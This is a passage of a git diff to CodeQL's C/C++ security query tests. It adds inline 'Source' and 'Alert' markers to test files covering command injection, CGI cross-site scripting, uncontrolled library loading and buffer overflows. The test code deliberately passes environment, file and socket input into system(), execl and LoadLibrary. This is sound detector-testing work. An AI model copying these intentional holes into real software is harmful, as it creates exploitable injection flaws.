call to operator+ | call to operator+ | -| test.cpp:121:25:121:28 | call to data | test.cpp:120:20:120:38 | *call to getenv | test.cpp:121:10:121:30 | *call to data | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:120:20:120:38 | *call to getenv | user input (an environment variable) | test.cpp:121:17:121:17 | call to operator+ | call to operator+ | -| test.cpp:144:10:144:16 | command | test.cpp:141:9:141:11 | fread output argument | test.cpp:144:10:144:16 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:141:9:141:11 | fread output argument | user input (string read by fread) | test.cpp:143:11:143:17 | sprintf output argument | sprintf output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:178:13:178:17 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:179:13:179:19 | strncat output argument | strncat output argument | -| test.cpp:184:32:184:38 | command | test.cpp:175:9:175:16 | fread output argument | test.cpp:184:32:184:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:175:9:175:16 | fread output argument | user input (string read by fread) | test.cpp:181:13:181:19 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:188:11:188:15 | strncat output argument | strncat output argument | -| test.cpp:199:32:199:38 | command | test.cpp:195:9:195:16 | fread output argument | test.cpp:199:32:199:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:195:9:195:16 | fread output argument | user input (string read by fread) | test.cpp:189:11:189:17 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:223:32:223:38 | command | test.cpp:219:9:219:16 | fread output argument | test.cpp:223:32:223:38 | *command | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to execl. | test.cpp:219:9:219:16 | fread output argument | user input (string read by fread) | test.cpp:221:10:221:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:231:19:231:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:231:19:231:33 | *call to getenv | user input (an environment variable) | test.cpp:231:11:231:16 | strncat output argument | strncat output argument | -| test.cpp:234:10:234:15 | buffer | test.cpp:232:19:232:33 | *call to getenv | test.cpp:234:10:234:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:232:19:232:33 | *call to getenv | user input (an environment variable) | test.cpp:232:11:232:16 | strncat output argument | strncat output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:243:5:243:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:243:5:243:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:242:11:242:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:244:5:244:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:244:5:244:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:249:10:249:16 | buffer2 | test.cpp:248:5:248:10 | *call to getenv | test.cpp:249:10:249:16 | *buffer2 | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:248:5:248:10 | *call to getenv | user input (an environment variable) | test.cpp:245:11:245:17 | sprintf output argument | sprintf output argument | -| test.cpp:261:10:261:15 | buffer | test.cpp:259:21:259:35 | *call to getenv | test.cpp:261:10:261:15 | *buffer | This argument to an OS command is derived from $@, dangerously concatenated into $@, and then passed to system(string). | test.cpp:259:21:259:35 | *call to getenv | user input (an environment variable) | test.cpp:259:13:259:18 | strncat output argument | strncat output argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref index 1de765a2fdf1..4e996a47ad54 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/ExecTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-078/ExecTainted.ql +query: Security/CWE/CWE-078/ExecTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp index 8c7651f32756..3749d6137953 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-078/semmle/ExecTainted/test.cpp @@ -12,7 +12,7 @@ extern void encodeShellString(char *shellStr, int maxChars, const char* cStr); #include "../../../../../../include/string.h" ///// Test code ///// -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source char *userName = argv[2]; { @@ -20,7 +20,7 @@ int main(int argc, char** argv) { // a command. char command1[1000] = {0}; sprintf(command1, "userinfo -v \"%s\"", userName); - system(command1); + system(command1); // $ Alert } { @@ -44,11 +44,11 @@ void test2(char* arg2) { void test3(char* arg1) { // GOOD?: the user string is a `$CFLAGS` environment variable - char *envCflags = getenv("CFLAGS"); + char *envCflags = getenv("CFLAGS"); // $ Source char command[1000]; sprintf(command, "%s %s", arg1, envCflags); - system(command); + system(command); // $ Alert } typedef unsigned long size_t; @@ -60,10 +60,10 @@ char *strncat(char *s1, const char *s2, size_t n); void test4(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(command, filename, 1000); - system(command); + system(command); // $ Alert } void test5(FILE *f) { @@ -80,19 +80,19 @@ int execl(char *path, char *arg1, ...); void test6(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(command, filename, 1000); - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test7(FILE *f) { // GOOD [FALSE POSITIVE]: the user string is a positional argument to a shell script char path[1000] = "/home/me/", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source strncat(path, filename, 1000); - execl("/bin/sh", "sh", "-c", "script.sh", path); + execl("/bin/sh", "sh", "-c", "script.sh", path); // $ Alert } void test8(char *arg2) { @@ -104,21 +104,21 @@ void test8(char *arg2) { void test9(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); + std::string path(getenv("something")); // $ Source std::string command = "mv " + path; - system(command.c_str()); + system(command.c_str()); // $ Alert } void test10(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); - system(("mv " + path).c_str()); + std::string path(getenv("something")); // $ Source + system(("mv " + path).c_str()); // $ Alert } void test11(FILE *f) { // BAD: the user string is injected directly into a command - std::string path(getenv("something")); - system(("mv " + path).data()); + std::string path(getenv("something")); // $ Source + system(("mv " + path).data()); // $ Alert } int atoi(char *); @@ -138,10 +138,10 @@ void test13(FILE *f) { char str[1000]; char command[1000]; - fread(str, 1, 1000, f); + fread(str, 1, 1000, f); // $ Source sprintf(command, "echo %s", str); - system(command); // BAD: the user string was printed into the command with the %s specifier + system(command); // BAD: the user string was printed into the command with the %s specifier // $ Alert } void test14(FILE *f) { @@ -172,7 +172,7 @@ void test15(FILE *f) { void test16(FILE *f, bool use_flags) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", flags[1000] = "-R", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source if (use_flags) { strncat(flags, filename, 1000); @@ -181,7 +181,7 @@ void test16(FILE *f, bool use_flags) { strncat(command, filename, 1000); } - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void concat(char *command, char *flags, char *filename) { @@ -192,11 +192,11 @@ void concat(char *command, char *flags, char *filename) { void test17(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", flags[1000] = "-R", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source concat(command, flags, filename); - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test18() { @@ -216,11 +216,11 @@ void test18() { void test19(FILE *f) { // BAD: the user string is injected directly into a command char command[1000] = "mv ", filename[1000]; - fread(filename, 1, 1000, f); + fread(filename, 1, 1000, f); // $ Source CONCAT(command, filename) - execl("/bin/sh", "sh", "-c", command); + execl("/bin/sh", "sh", "-c", command); // $ Alert } void test20() { @@ -228,10 +228,10 @@ void test20() { char buffer[1024 * 4]; strncpy(buffer, getenv("var_a"), 1024); - strncat(buffer, getenv("var_b"), 1024); - strncat(buffer, getenv("var_c"), 1024); + strncat(buffer, getenv("var_b"), 1024); // $ Source + strncat(buffer, getenv("var_c"), 1024); // $ Source strncat(buffer, " ", 1024); - system(buffer); + system(buffer); // $ Alert } void test21() { @@ -240,13 +240,13 @@ void test21() { char buffer2[1024]; sprintf(buffer1, "%s %s", - getenv("var_a"), - getenv("var_b")); + getenv("var_a"), // $ Source + getenv("var_b")); // $ Source sprintf(buffer2, "%s %s %s", " ", buffer1, - getenv("var_c")); - system(buffer2); + getenv("var_c")); // $ Source + system(buffer2); // $ Alert } void test22() { @@ -256,9 +256,9 @@ void test22() { strncpy(buffer, "command ", 1024); for (i = 0; i < 10; i++) { - strncat(buffer, getenv("var_a"), 1024); + strncat(buffer, getenv("var_a"), 1024); // $ Source } - system(buffer); + system(buffer); // $ Alert } // open question: do we want to report certain sources even when they're the start of the string? diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected index 4f31dd3e17bf..be2a5f70bccd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.expected @@ -1,3 +1,7 @@ +#select +| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | +| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | edges | search.c:14:24:14:28 | *query | search.c:17:8:17:12 | *query | provenance | | | search.c:22:24:22:28 | *query | search.c:23:39:23:43 | *query | provenance | | @@ -22,7 +26,3 @@ nodes | search.c:73:17:73:25 | *raw_query | semmle.label | *raw_query | | search.c:77:17:77:25 | *raw_query | semmle.label | *raw_query | subpaths -#select -| search.c:17:8:17:12 | *query | search.c:67:21:67:26 | *call to getenv | search.c:17:8:17:12 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:23:39:23:43 | *query | search.c:67:21:67:26 | *call to getenv | search.c:23:39:23:43 | *query | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | -| search.c:62:8:62:17 | *query_text | search.c:67:21:67:26 | *call to getenv | search.c:62:8:62:17 | *query_text | Cross-site scripting vulnerability due to $@. | search.c:67:21:67:26 | call to getenv | this query data | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref index bd5e957761b3..1192c6d67f56 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/CgiXss.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-079/CgiXss.ql +query: Security/CWE/CWE-079/CgiXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c index 9369d80fd913..830a5919eb3c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-079/semmle/CgiXss/search.c @@ -14,13 +14,13 @@ char* escape_html(char* raw); void bad_server1(char* query) { puts("

Query results for "); // BAD: Printing out an HTTP parameter with no escaping - puts(query); + puts(query); // $ Alert puts("\n

\n"); puts(do_search(query)); } void bad_server2(char* query) { - printf("

Query results for %s\n", query); + printf("

Query results for %s\n", query); // $ Alert // BAD: Printing out an HTTP parameter with no escaping puts("\n

"); puts(do_search(query)); @@ -59,12 +59,12 @@ void bad_server3(char* query) { puts("

Query results for "); // BAD: Printing out an HTTP parameter with no escaping - puts(query_text); + puts(query_text); // $ Alert puts("\n

\n"); } int main(int argc, char** argv) { - char* raw_query = getenv("QUERY_STRING"); + char* raw_query = getenv("QUERY_STRING"); // $ Source if (strcmp("good1", argv[0]) == 0) { good_server1(raw_query); } else if (strcmp("bad1", argv[0]) == 0) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index f328113106e4..999c7f5240df 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,3 +1,5 @@ +#select +| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | edges | test.cpp:37:73:37:76 | *data | test.cpp:43:32:43:35 | *data | provenance | | | test.cpp:64:30:64:35 | *call to getenv | test.cpp:64:30:64:35 | *call to getenv | provenance | | @@ -10,5 +12,3 @@ nodes | test.cpp:64:30:64:35 | *call to getenv | semmle.label | *call to getenv | | test.cpp:73:24:73:27 | *data | semmle.label | *data | subpaths -#select -| test.cpp:43:32:43:35 | *data | test.cpp:64:30:64:35 | *call to getenv | test.cpp:43:32:43:35 | *data | The value of this argument may come from $@ and is being passed to LoadLibraryA. | test.cpp:64:30:64:35 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref index a9ca1db51997..57318b8ffeb2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-114/UncontrolledProcessOperation.ql +query: Security/CWE/CWE-114/UncontrolledProcessOperation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp index 299e0372d4ae..bae7e5fdf995 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/SAMATE/UncontrolledProcessOperation/test.cpp @@ -40,7 +40,7 @@ void CWE114_Process_Control__w32_char_environment_82_bad::action(char * data) HMODULE hModule; /* POTENTIAL FLAW: If the path to the library is not specified, an attacker may be able to * replace his own file with the intended library */ - hModule = LoadLibraryA(data); + hModule = LoadLibraryA(data); // $ Alert if (hModule != NULL) { FreeLibrary(hModule); @@ -61,7 +61,7 @@ void bad() { /* Append input from an environment variable to data */ size_t dataLen = strlen(data); - char * environment = GETENV(ENV_VARIABLE); + char * environment = GETENV(ENV_VARIABLE); // $ Source /* If there is data in the environment variable */ if (environment != NULL) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected index ca24075c2c34..c7cc621e4b3a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.expected @@ -1,3 +1,14 @@ +#select +| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | +| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | +| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | +| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:76:12:76:17 | fgets output argument | string read by fgets | +| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | +| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | +| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | edges | test.cpp:24:30:24:36 | *command | test.cpp:26:10:26:16 | *command | provenance | | | test.cpp:29:30:29:36 | *command | test.cpp:31:10:31:16 | *command | provenance | | @@ -40,14 +51,3 @@ nodes | test.cpp:113:8:113:12 | *call to fgets | semmle.label | *call to fgets | | test.cpp:114:9:114:11 | *ptr | semmle.label | *ptr | subpaths -#select -| test.cpp:26:10:26:16 | *command | test.cpp:42:18:42:34 | *call to getenv | test.cpp:26:10:26:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:42:18:42:34 | *call to getenv | an environment variable | -| test.cpp:31:10:31:16 | *command | test.cpp:43:18:43:34 | *call to getenv | test.cpp:31:10:31:16 | *command | The value of this argument may come from $@ and is being passed to system. | test.cpp:43:18:43:34 | *call to getenv | an environment variable | -| test.cpp:62:10:62:15 | *buffer | test.cpp:56:12:56:17 | fgets output argument | test.cpp:62:10:62:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:63:10:63:13 | *data | test.cpp:56:12:56:17 | fgets output argument | test.cpp:63:10:63:13 | *data | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:64:10:64:16 | *dataref | test.cpp:56:12:56:17 | fgets output argument | test.cpp:64:10:64:16 | *dataref | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:65:10:65:14 | *data2 | test.cpp:56:12:56:17 | fgets output argument | test.cpp:65:10:65:14 | *data2 | The value of this argument may come from $@ and is being passed to system. | test.cpp:56:12:56:17 | fgets output argument | string read by fgets | -| test.cpp:78:10:78:15 | *buffer | test.cpp:76:12:76:17 | fgets output argument | test.cpp:78:10:78:15 | *buffer | The value of this argument may come from $@ and is being passed to system. | test.cpp:76:12:76:17 | fgets output argument | string read by fgets | -| test.cpp:99:15:99:20 | *buffer | test.cpp:98:17:98:22 | recv output argument | test.cpp:99:15:99:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:98:17:98:22 | recv output argument | buffer read by recv | -| test.cpp:107:15:107:20 | *buffer | test.cpp:106:17:106:22 | recv output argument | test.cpp:107:15:107:20 | *buffer | The value of this argument may come from $@ and is being passed to LoadLibrary. | test.cpp:106:17:106:22 | recv output argument | buffer read by recv | -| test.cpp:114:9:114:11 | *ptr | test.cpp:113:8:113:12 | *call to fgets | test.cpp:114:9:114:11 | *ptr | The value of this argument may come from $@ and is being passed to system. | test.cpp:113:8:113:12 | *call to fgets | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref index a9ca1db51997..57318b8ffeb2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-114/UncontrolledProcessOperation.ql +query: Security/CWE/CWE-114/UncontrolledProcessOperation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp index ed3adcb8d809..064ba375a0f4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp @@ -23,12 +23,12 @@ class MyDerived : public MyBase void doCommand2(const char *command) { - system(command); // BAD (externally controlled string) + system(command); // BAD (externally controlled string) // $ Alert } void doCommand3(const char *command) { - system(command); // BAD (externally controlled string) + system(command); // BAD (externally controlled string) // $ Alert } }; @@ -39,8 +39,8 @@ void testMyDerived() MyBase *md3 = new MyDerived; // MyBase pointer to a MyDerived md1->doCommand1("fixed"); - md2->doCommand2(getenv("varname")); - md3->doCommand3(getenv("varname")); + md2->doCommand2(getenv("varname")); // $ Source + md3->doCommand3(getenv("varname")); // $ Source } // --- @@ -53,16 +53,16 @@ void testReferencePointer1() { char buffer[1024]; - if (fgets(buffer, 1024, stdin) != 0) + if (fgets(buffer, 1024, stdin) != 0) // $ Source { char *data = buffer; char *&dataref = data; char *data2 = dataref; - system(buffer); // BAD - system(data); // BAD - system(dataref); // BAD - system(data2); // BAD + system(buffer); // BAD // $ Alert + system(data); // BAD // $ Alert + system(dataref); // BAD // $ Alert + system(data2); // BAD // $ Alert } } @@ -73,9 +73,9 @@ void testReferencePointer2() char *&dataref = data; char *data2 = dataref; - if (fgets(buffer, 1024, stdin) != 0) + if (fgets(buffer, 1024, stdin) != 0) // $ Source { - system(buffer); // BAD + system(buffer); // BAD // $ Alert system(data); // BAD system(dataref); // BAD [NOT DETECTED] system(data2); // BAD [NOT DETECTED] @@ -95,21 +95,21 @@ void testAcceptRecv(int socket1, int socket2) { char buffer[1024]; - recv(socket1, buffer, 1024); - LoadLibrary(buffer); // BAD: using data from recv + recv(socket1, buffer, 1024); // $ Source + LoadLibrary(buffer); // BAD: using data from recv // $ Alert } { char buffer[1024]; accept(socket2, 0, 0); - recv(socket2, buffer, 1024); - LoadLibrary(buffer); // BAD: using data from recv + recv(socket2, buffer, 1024); // $ Source + LoadLibrary(buffer); // BAD: using data from recv // $ Alert } } void argumentUse(char *ptr, FILE *stream) { char buffer[80]; - ptr = fgets(buffer, sizeof(buffer), stream); - system(ptr); // BAD + ptr = fgets(buffer, sizeof(buffer), stream); // $ Source + system(ptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref index 5c2bacec579f..bb308ea4b215 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-119/OverflowBuffer.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverflowBuffer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref index a4213e22fcd7..0e0d1d3792de 100644 --- 